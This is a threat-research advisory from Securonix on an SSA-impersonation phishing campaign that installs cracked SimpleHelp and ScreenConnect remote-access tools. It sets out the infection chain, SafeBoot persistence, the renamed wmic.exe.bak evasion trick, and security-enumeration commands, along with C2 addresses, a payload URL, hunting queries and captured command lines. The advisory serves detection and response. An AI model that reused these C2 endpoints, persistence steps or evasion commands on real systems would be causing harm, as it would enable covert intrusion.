Blog

VENOMOUS#HELPER: Dual-RMM Phishing Campaign Leveraging JWrapper-Packaged SimpleHelp and ScreenConnect for Silent Remote Access

Threat Intelligence, Threat Research, Threat Security

VENOMOUS#HELPER: Dual-RMM Phishing Campaign Leveraging JWrapper-Packaged SimpleHelp and ScreenConnect for Silent Remote Access

By Securonix Threat Research: Akshay Gaikwad, Shikha Sangwan, Aaron Beardslee

 

 

tldr:

Phishing campaigns leveraging remote management tools is nothing new. Securonix Threat Research has conducted in-depth dynamic analysis of an ongoing phishing campaign targeting multiple vectors, active since at least April 2025. The campaign has impacted over 80 organizations, predominantly in the United States, spanning multiple sectors. This campaign leverages vendor-signed Remote Monitoring and Management (RMM) software to establish silent, persistent access. In this case, a customized SimpleHelp and SecureConnect RMMs are used to bypass defenses as they are legitimately installed by the unsuspecting victim. This campaign appears to have been tracked previously by Sophos (tracked as STAC6405) and Redcanary independently while the indicators and behavior within this advisory support and extend the depth of their respective research.

The campaign is notable for deploying two independent RMM tools simultaneously, a self-hosted SimpleHelp 5.0.1 instance and a ScreenConnect relay, creating a redundant dual-channel access architecture that survives remediation of either channel independently. Infection originates from SSA government impersonation phishing where the victim is directed to verify their email and download a purported SSA statement. After the user opens the ‘SSA statement’, the malware silently installs itself as a Windows service with Safe Mode persistence, automated security posture surveillance running every 67 seconds, and operator presence detection polling every 23 seconds. No attribution has been formally assigned; Securonix assesses this activity is consistent with a financially motivated Initial Access Broker (IAB) or ransomware precursor operation targeting the Western economic bloc.

 

Key Findings:

Attribute Detail
Campaign Name STAC6405 (Sophos cluster)
Active Since April 2025 (ongoing)
Primary Targets United States, Western Europe, Latin America (9 languages)
Initial Vector
U.S. Social Security Administration (SSA) government impersonation phishing → compromised [.]com.mx frontend → payload download
Phishing Frontend
gruta[.]com.mx (email harvesting; attacker-controlled or compromised .com.mx domain currently serving live SSA phishing content (Google-indexed))
Payload Host
server.cubatiendaalimentos[.]com[.]mx/~tiendazoycom/sns/ (legitimate Mexican grocery e-commerce site (PrestaShop); payload hosted under a separate shared hosting account (~tiendazoycom) on the same server)
Primary RMM SimpleHelp 5.0.1 (self-hosted, cracked build) via JWrapper
Secondary RMM ConnectWise ScreenConnect (self-hosted relay, port 8041)
Persistence Windows SCM service + SafeBoot\Network registry key
Attribution Unattributed; assessed as financially motivated IAB/ransomware precursor
Infrastructure 84.200.205[.]233:5555 (SimpleHelp C2) | 213.136.71.246:8041 (ScreenConnect relay)
Relay Domain sslzeromail[.]run.place -> 213.136.71.246 (IONOS DE, AS8560)

Infection Chain: From Phishing Email to Persistent Access

The STAC6405 infection chain begins with a U.S. Social Security Administration (SSA) government impersonation phishing email and progresses through a multi-stage delivery pipeline before any malicious process executes on the victim host. The following stages were captured during dynamic analysis of the campaign.

Stage 0 — Delivery: SSA-Themed Phishing Email and Two-Stage Compromised Hosting

Victims receive an email impersonating the U.S. Social Security Administration, claiming a new statement is available for review. The email contains a link to a compromised legitimate Mexican business website (gruta[.]com.mx) rather than an attacker-registered domain, a deliberate technique to bypass Secure Email Gateway (SEG) reputation filtering, since established [.]com.mx domains carry legitimate reputation scores that newly registered attacker domains would lack.

 

 

The gruta[.]com.mx landing page presents a convincing SSA-branded verification page prompting the user to confirm their email address before ‘accessing their statement.’ This email harvesting step serves a dual purpose: it validates that the victim is real and attentive, and it gives the attacker a deliverable contact for follow-on campaigns.

Upon email submission, the victim is directed to download the payload from a second attacker-controlled host: server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe

 

 

 

 

 

This URL reveals a cPanel legacy shared hosting compromise. The tilde (~) prefix and username path (tiendazoycom) indicate the attacker gained access to a single cPanel user account on the legitimate hosting server, not the root server itself. The legitimate business site (cubatiendaalimentos[.]com.mx — a Cuban food retailer) remains unmodified; only the weaponized /~tiendazoycom/sns/ subdirectory is attacker-controlled. The /sns/ directory path is assessed as a deliberate reference to Social Security, maintaining lure consistency.

The downloaded file (statement5648.exe) exploits two Windows default behaviors to appear legitimate:

  • File extensions are hidden by default in Windows Explorer, causing ‘statement5648.exe’ to display as ‘statement5648’ masquerading as an authentic numbered government reference document
  • JWrapper embeds a custom application icon and splash image in the binary, further reinforcing the document appearance

 

 

UAC Prompt Social Engineering

When the victim double-clicks the lure, Windows User Account Control (UAC) displays a prompt before execution. Rather than the red ‘Unknown Publisher’ warning that malware typically triggers, the victim sees:

Verified publisher: SimpleHelp Ltd  ← Blue shield icon (trusted, Thawte-signed cert)

Do you want to allow this app to make changes to your device?

 

 

The victim is in the cognitive frame of opening a government SSA document. The UAC prompt naming ‘SimpleHelp Ltd’ as a verified publisher sounds plausible in a support context (‘help’ with your Social Security). The valid Thawte Authenticode certificate produces the blue verified shield rather than the red unknown publisher warning. These factors combine to substantially increase approval rates. This is the sole moment where victim interaction is required, every subsequent step of the infection chain runs silently with no further prompts.

Stage 1 — Initial Execution: JWrapper Bootstrap (statement5648.exe)

The phishing lure is a JWrapper-packaged Windows executable named to mimic official government or legal documents (e.g., statement5648.exe, ContractAgreementToSign.exe) — consistent with the SSA government impersonation pretext used in the delivery stage. When executed from the victim’s Downloads directory, the binary’s embedded extractor activates:

  • Reads and decrypts a 213KB encrypted configuration overlay appended after the PE sections
  • Extracts a bundled private JRE (Oracle Java 1.7.0_79, EOL 2015) to C:\ProgramData\JWrapper-Remote Access\
  • Decodes hex-encoded C2 configuration: sg_servers = udp://84.200.205[.]233:5555
  • Writes a JWLaunchProperties config file to disk, passes it to the JVM as an argument, then deletes it within milliseconds
  • The process runs entirely silently: sg_silent_install=true, show_no_ui=true, sg_install_shortcuts=false

The originating executable path (C:\Users\<victim>\Downloads\<lure>.exe) is permanently baked into every subsequent binary the installer generates, serving as a forensic origin marker.

 

 

Stage 2 — Service Installation: SimpleService.exe

SimpleService.exe reads the simplegateway.service config file and registers a persistent Windows service named ‘Remote Access Service’ via the Windows Service Control Manager (SCM). Beyond standard service registration, it performs two critical persistence operations:

  • Safe Mode Persistence: Writes to HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Remote Access Service, ensuring the RAT survives Safe Mode with Networking reboots — the most common defender response to persistent malware
  • Liveness Watchdog: Monitors the file C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\sgalive. If the RAT process fails to update this file, SimpleService.exe automatically restarts it, providing self-healing persistence

The service binary path set in the registry points back to SimpleService.exe with the service config file as its argument, ensuring the chain survives reboots.

Stage 3 — JVM Launch: SimpleGatewayService.exe

SimpleGatewayService.exe is a self-contained JWrapper launcher with the complete attacker C2 configuration baked into its 213KB encrypted binary overlay. It bootstraps the Java runtime and launches customer.jar — the core SimpleHelp RAT — with the following hardened JVM flags:

  • -Xrs: Suppresses OS signal handling, making the process resistant to SIGTERM and standard kill commands
  • -Djava.net.preferIPv4Stack=true: Forces IPv4 to avoid IPv6 routing issues on victim hosts
  • -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2: Explicitly downgrades TLS to support the EOL Java 1.7 runtime communicating with modern C2 infrastructure
  • -Xmx256m: Caps heap at 256MB to maintain a minimal memory footprint

Stage 4 — Session Escalation: session_win.exe + elev_win.exe

The RAT cannot interact with the user desktop from Session 0 (SYSTEM) without crossing session boundaries. It accomplishes this through a two-binary escalation chain:

  • session_win.exe acquires SeDebugPrivilege via AdjustTokenPrivileges, then enumerates running processes using CreateToolhelp32Snapshot to locate winlogon.exe in the target interactive session. It calls OpenProcessToken and DuplicateTokenEx to clone the Winlogon token, then uses CreateProcessAsUserW with CreateEnvironmentBlock to launch child processes in the victim’s desktop context
  • elev_win.exe handles UAC elevation via ShellExecuteEx with the ‘runas’ verb (Vista+) or CreateProcessWithLogonW with stored credentials (XP-era fallback). It also provides the –mouselocation switch for cursor position polling and –amiadministrator for privilege checking

This chain enables the attacker to achieve fully interactive desktop access — reading the screen, injecting keystrokes, and accessing user-context resources — all from a SYSTEM service.

Stage 5 — C2 Beacon and Dual-Channel Establishment

With the service running, the SimpleHelp gateway component connects outbound to the attacker’s self-hosted server:

  • Primary C2 channel: udp://84.200.205[.]233:5555 (SimpleHelp SimpleGateway protocol) — provides scripted command execution, automated monitoring, and file transfer
  • Secondary C2 channel: relay://sslzeromail[.]run.place:8041 (ScreenConnect relay) — provides interactive desktop access via ConnectWise ScreenConnect installed separately

The victim machine registers on the attacker’s console under its hostname (e.g., WKS-DEV01) with its campaign profile ID (sh_app_profile: 43794105415826700294423976831165084124). The attacker’s console immediately begins receiving automated telemetry from the continuous monitoring loop described in Section 3.

Both channels operate independently. If the ScreenConnect relay domain is taken down, the SimpleHelp channel survives, and vice versa. The attacker designed this redundancy deliberately to ensure access persists through partial remediation.

 

 

Why RMM Software Instead of Custom Malware

The central evasion insight of STAC6405 is that RMM software is inherently trusted. All SimpleHelp binaries carry valid Authenticode signatures from SimpleHelp Ltd issued by Thawte, a globally trusted CA. The ScreenConnect client is similarly signed by ConnectWise. This means:

  • Antivirus products will not flag the files — they pass signature-based checks at every stage
  • Windows SmartScreen and Mark-of-the-Web protections are bypassed by the valid code signatures
  • EDR behavioral rules must rely entirely on process lineage and parent-child relationships rather than file hashes
  • Network security controls see outbound connections to known commercial software endpoints, not to known-malicious C2 infrastructure

The specific SimpleHelp build deployed (version 5.0.1, compiled 2017-07-07) is consistent with a cracked or leaked package circulated in criminal forums since the 2016–2019 era. The expired certificate validity window (2015–2018) and the absence of any license authentication behavior confirms this is not a legitimately licensed deployment. This cracked distribution model means the attacker incurred zero acquisition cost and left no payment trail with the software vendor.

 

 

The Dual-RMM Architecture

The two RMM tools serve distinct operational roles that complement each other:

Attribute SimpleHelp (JWrapper) ScreenConnect
Primary Role Automated surveillance + scripted command execution
Interactive desktop access (hands-on-keyboard)
Protocol UDP + HTTP (port 5555) Proprietary relay (TCP port 8041)
C2 Host 84.200.205[.]233 (undisclosed hosting) 213.136.71.246 (IONOS DE, AS8560)
C2 Domain None (IP-direct) sslzeromail[.]run.place
Persistence Windows service + SafeBoot registry key + liveness watchdog
Enrolled in attacker ScreenConnect tenant
Detection Difficulty High (signed, legitimate vendor binary set) High (signed ConnectWise client)
Redundancy Role Survives ScreenConnect domain takedown Survives SimpleHelp IP block

SimpleHelp Capability Profile

The deployed SimpleHelp version (5.0.1) provides a comprehensive remote administration capability set. Analysis of customer.jar via static decompilation and runtime observation confirmed the following capabilities are present and enabled:

  • Full Remote Desktop (VNC-based): Complete interactive desktop control with screen capture, keyboard and mouse injection via SendInput/SetCursorPos APIs, and clipboard access
  • Shell / Command Execution: Scripted command execution via winpty-agent64.exe, a Windows pseudo-terminal bridge that provides a fully functional interactive shell session over named pipes. Supports cmd.exe, PowerShell, and any console application
  • Silent Session Access: RequireSessionConfirmation=false in serviceconfig.xml means the attacker connects with no victim notification, no taskbar popup, and no UI indicator of any kind
  • Cross-Session Process Injection: exe enables execution in the victim’s interactive desktop session from the SYSTEM service context by stealing a process token from winlogon.exe using SeDebugPrivilege and DuplicateTokenEx
  • UAC Elevation: exe provides silent privilege elevation via ShellExecuteEx ‘runas’ verb (Vista+) or CreateProcessWithLogonW with credentials (XP-era), enabling execution as Administrator without user confirmation
  • File Transfer (Bidirectional): Full upload and download capability via the FSSync and FSMirror modules embedded in customer.jar
  • Windows Firewall Bypass: FirewallAdder utility silently calls netsh.exe to add firewall exceptions for the Remote Access Service without user notification
  • Scripting and Automation: AllowScripting=true in serviceconfig.xml enables the attacker to push and execute PowerShell, cmd, and other scripts without requiring an interactive desktop session
  • Self-Healing: AllowRecovery=true enables the attacker’s server to force service restarts and re-registration on the victim host remotely if the connection drops
  • Cross-Platform Support: jar contains embedded macOS and Linux binaries (uidsetter32/64, LinuxServiceManager), indicating the same package is used across operating systems

 

Automated Surveillance Loop

Dynamic analysis of the deployed RAT over a one-hour observation window captured 986 Sysmon Event ID 1 (process creation) events generated entirely by the RAT’s background monitoring infrastructure with no operator interaction. Three independent polling loops run concurrently:

Loop Interval Count / Hour Command
WiFi Interface Monitor ~15 seconds 233x
netsh wlan show interfaces
User Presence Detection ~23 seconds 157x
elev_win.exe –mouselocation
Security Suite Enumeration ~67 seconds 54x each (4 queries)
wmic SecurityCenter2 + netsh advfirewall

The equal execution counts across all four security enumeration queries (54x each) confirm these fire as a synchronized batch rather than independent triggers, a defining signature of automation rather than hands-on-keyboard activity.

Notable EDR Evasion: wmic.exe.bak

A particularly significant evasion technique was observed within the security enumeration loop. The RAT executes each SecurityCenter2 query via two separate paths simultaneously:

  1. Direct: Remote Access.exe → wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get
  2. Evasion: Remote Access.exe → cmd.exe → wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get

wmic.exe.bak is a renamed copy of the legitimate wmic.exe binary placed at C:\Windows\System32\wbem\wmic.exe.bak. This technique bypasses name-based EDR detection rules that key on ‘wmic.exe’ while preserving identical functionality. The file C:\Windows\System32\wbem\wmic.exe.bak should be treated as a high-confidence static IOC indicating STAC6405 presence on a host.

 

Conclusion

At this stage of the attack, the threat actor has achieved a deeply entrenched position on the victim host with minimal forensic visibility. A persistent Windows service surviving Safe Mode reboots, two independent remote access channels operating over signed vendor binaries, a self-healing watchdog that restarts the RAT if it is killed, and a continuous automated surveillance loop reporting the victim’s security posture back to the attacker every 67 seconds, all without a single piece of traditional malware touching disk. The victim organization is left in a state where the attacker can return at any time, execute commands silently in the user’s desktop session, transfer files bidirectionally, and pivot to adjacent systems, while standard antivirus and signature-based controls see nothing but legitimately signed software from a reputable UK vendor. Remediation requires not only removing the service and registry keys but hunting for the renamed wmic.exe.bak binary, auditing the SafeBoot registry hive, and verifying that no second-stage payloads were delivered during any period of operator activity.This campaign is a direct illustration of why behavioral analytics and host telemetry capable of identifying anomalous process lineage, automated polling patterns, and service installation from non-standard paths are essential, because when the malware is the IT management software, the only thing that catches it is the behavior it leaves behind.

 

Securonix Recommendations

Behavioral analysis indicates the threat actor does not immediately engage hands-on-keyboard following infection. Instead, the RAT operates in a passive surveillance posture — continuously updating the attacker’s console with network state, security product inventory, and user presence data. Based on the mouse position polling cadence (every 23 seconds), Securonix assesses the operator monitors the victim’s idle state and activates only when cursor position has remained static for an extended period, consistent with the victim being away from their workstation. This ‘wait-for-idle’ pattern is a deliberate operational security technique to minimize the risk of the victim observing unauthorized desktop activity.

When an operator does engage, the automated monitoring baseline continues running underneath hands-on-keyboard activity. Defenders should watch for non-repeating, aperiodic process creation events from Remote Access.exe layered on top of the regular automated loop — particularly initial situational awareness commands (whoami, ipconfig, net user, systeminfo) issued in rapid succession, which constitute the operator’s orientation burst upon first interactive connection.

Securonix highly recommends high fidelity endpoint monitoring, such as Sysmon, to capture process creation, network connections tied to processes, dns resolution from the endpoint, and file creation events to provide a full picture of what is happening on the system. Commands found in this advisory were captured with Sysmon Event ID 1 Process Creation.

 

 

MITRE ATT&CK Matrix

 

Technique ID Technique Name Observed Behavior
T1566.001 Phishing: Spearphishing Attachment
U.S. SSA government impersonation email with link to compromised [.]com.mx frontend
T1584.001 Compromise Infrastructure: Domains
Two legitimate [.]com.mx business sites used for staging and delivery
T1219 Remote Access Software
SimpleHelp + ScreenConnect deployed as dual-RMM
T1543.003 Create or Modify System Process: Windows Service
Remote Access Service installed via SCM
T1562.009 Impair Defenses: Safe Mode Boot
SafeBoot\Network registry key for Safe Mode persistence
T1134.001 Access Token Manipulation: Token Impersonation
winlogon.exe token theft via session_win.exe
T1134.002 Access Token Manipulation: Create Process with Token CreateProcessAsUserW with stolen token
T1548.002 Abuse Elevation Control Mechanism: Bypass UAC elev_win.exe –runas via ShellExecuteEx
T1518.001 Software Discovery: Security Software Discovery
SecurityCenter2 WMI queries every 67 seconds
T1016 System Network Configuration Discovery
netsh wlan show interfaces every 15 seconds
T1036.003 Masquerading: Rename System Utilities wmic.exe renamed to wmic.exe.bak
T1497.001 Virtualization/Sandbox Evasion: System Checks
Mouse position polling for user presence detection
T1027 Obfuscated Files or Information
Hex-encoded C2 config in JWrapper launch properties

Relevant Securonix detections

  • EDR-ALL-1215-ERR
  • WEL-ALL-1186-ERR
  • EDR-ALL-32-ERR
  • WEL-ALL-1101-ERR
  • EDR-ALL-159-RU
  • WEL-ALL-1120-RU
  • EDR-ALL-987-ERR
  • EDR-ALL-1385-ERR
  • EDR-ALL-846-ER
  • EDR-ALL-73-ER
  • EDR-ALL-54-ER
  • EDR-ALL-1295-ERR
  • EDR-ALL-1032-RU
  • EDR-ALL-1274-RU
  • EDR-SYM88-ERI
  • WEL-ALL-1144-ERR
  • EDR-SYM19-ERI

Relevant hunting queries

(remove square brackets “[ ]” for IP addresses or URLs)

  • index=activity AND rg_functionality=”Next Generation Firewall” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
  • index=activity AND rg_functionality=”Firewall” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
  • index=activity AND rg_functionality=”Web Proxy” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
  • index=activity AND rg_functionality=”Web Application Firewall” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
  • index=activity AND rg_functionality=”DNS / DHCP” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
  • index=activity AND rg_functionality=”IDS / IPS / UTM / Threat Detection” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
  • index=activity AND rg_functionality=”Next Generation Firewall” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205[.]233”)
  • index=activity AND rg_functionality=”Firewall” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205.233”)
  • index=activity AND rg_functionality=”Web Proxy” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205.233”)
  • index=activity AND rg_functionality=”Web Application Firewall” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205[.]233”)
  • index=activity AND rg_functionality=”DNS / DHCP” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205.233”)
  • index=activity AND rg_functionality=”IDS / IPS / UTM / Threat Detection” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205.233”)

 

Network IOCs

 

Type Indicator Description
Domain gruta[.]com.mx
Compromised legitimate MX domain (est. 2002, Index Datacom S.A. de C.V.) — live SSA phishing frontend
URL server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/
Likely attacker-established infrastructure (domain est. Feb 2024) — payload delivery
URL server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe Direct payload download URL
IPv4 84.200.205.233 SimpleHelp C2 (UDP+HTTP :5555)
IPv4 213.136.71.246
ScreenConnect relay host (IONOS DE, AS8560)
Domain sslzeromail[.]run.place ScreenConnect relay FQDN
URL http[:]//84.200.205[.]233:5555/access/ SimpleHelp updater/download endpoint
C2 Protocol udp://84.200.205[.]233:5555 SimpleHelp SimpleGateway C2
C2 Protocol relay://sslzeromail[.]run.place:8041/ ScreenConnect relay URI

Campaign Identifiers

 

Type Indicator Description
Campaign ID 43794105415826700294423976831165084124 sh_app_profile — attacker SimpleHelp tenant ID (stable cross-victim)
Payload Hash bce1222fc9e64aba4dd6f963dfd3377afa1844a1df9d5026e06990c8dc5246453b15e61c4f2e0349702a1940c71716e3d327e5224ac6d6e6a7b6c233c15f10f3 shpkhash — payload package integrity token
JWrapper GU 52861018 JWrapper updater version baked into all installers
SCM Service Remote Access Service Windows service display name
Install Path C:\ProgramData\JWrapper-Remote Access\ Root installation directory
Liveness File C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\sgalive Watchdog heartbeat file
Static File IOC C:\Windows\System32\wbem\wmic.exe.bak Renamed wmic.exe — high-confidence host IOC
SafeBoot Key HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Remote Access Service Safe Mode persistence registry key

Analyzed files/hashes

 

File Name SHA256
customer.jar (SimpleHelp RAT core)
810a99a7d6696a36491530e286476b4cf8a819a47fb5e3801fdfecfdb2dc6193
SimpleGatewayService.exe
641230a9f3091bdd38d04c6df96062bfc82dfc4ff6f663ceb522d3881d6af53a
SimpleService.exe
dbdddea03c3fc4c2574ce4221450ec86221ebc615c4915c4c4eb3f2a5e3f5b25
session_win.exe
9369d7194ab03362e9e7af022a48bc6d4e7d91a6ab7c4b5cf5d90abbcd8c7012
elev_win.exe
97f801e750cfc2d4558020fb246782e034fd6101d75a59d8915b4f2b2b50ebd9
winpty-agent64.exe
11914d10b51b5a96606ae606b5ab70d79550e36c1cce94a86134107c59075e0c
jwrapper_utils.jar
76d85124db2778baecee24cc5ad56c9a3060c41c5b3c1b5cdc7f0435e0f77cac
serviceconfig.xml
d953dfbe8d91dc9fafad0a6117e1276fa636d4ae1b6a4d81616ff2446cf09234
simplegateway.service
3e4b3559fdbe584e19a1ff9b3142b429c6fb91aaa63b5c922c8c5b32c38e426a

Commands Captured During Dynamic Analysis

Process Name Parent Process Name Command Line
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete” /e /g “Users”:F
cacls.exe Remote Access Monitoring.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials” /e /g “Users”:F
cacls.exe Remote Access Monitoring.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun” /e /g “Users”:F
cacls.exe Remote Access Monitoring.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies” /e /g “Users”:F
cacls.exe Remote Access Monitoring.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun” /e /g “Users”:F
cacls.exe Remote Access Monitoring.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe” /t /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” /e /p “Users”:R
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWApps” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials” /e /g “Users”:F
cacls.exe Remote AccessLauncher.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\LastProxy” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceid.lock” /t /e /g “Users”:f
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe” /t /e /p “Users”:R
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\Remote_Access_ConfigureICO.ico” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7” /t /e /p “Users”:R
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\JWrapper-Remote Access-UninstallerICO.ico” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe” /t /e /p “Users”:R
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\ChosenLanguage” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\logs” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe” /t /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml” /e /p “Users”:R
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete” /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access” /e /g “Users”:F
cacls.exe Remote Access.exe cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService” /t /e /g “Users”:F
cacls.exe statement5648.exe cacls “C:\ProgramData\JWrapper-Remote Access\Remote AccessWinLauncher.exe” /e /g “Users”:F
cmd.exe wmic.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH FirewallProduct get
cmd.exe Remote Access.exe cmd.exe /c netsh advfirewall show all State
cmd.exe wmic.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiSpywareProduct get
cmd.exe wmic.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get
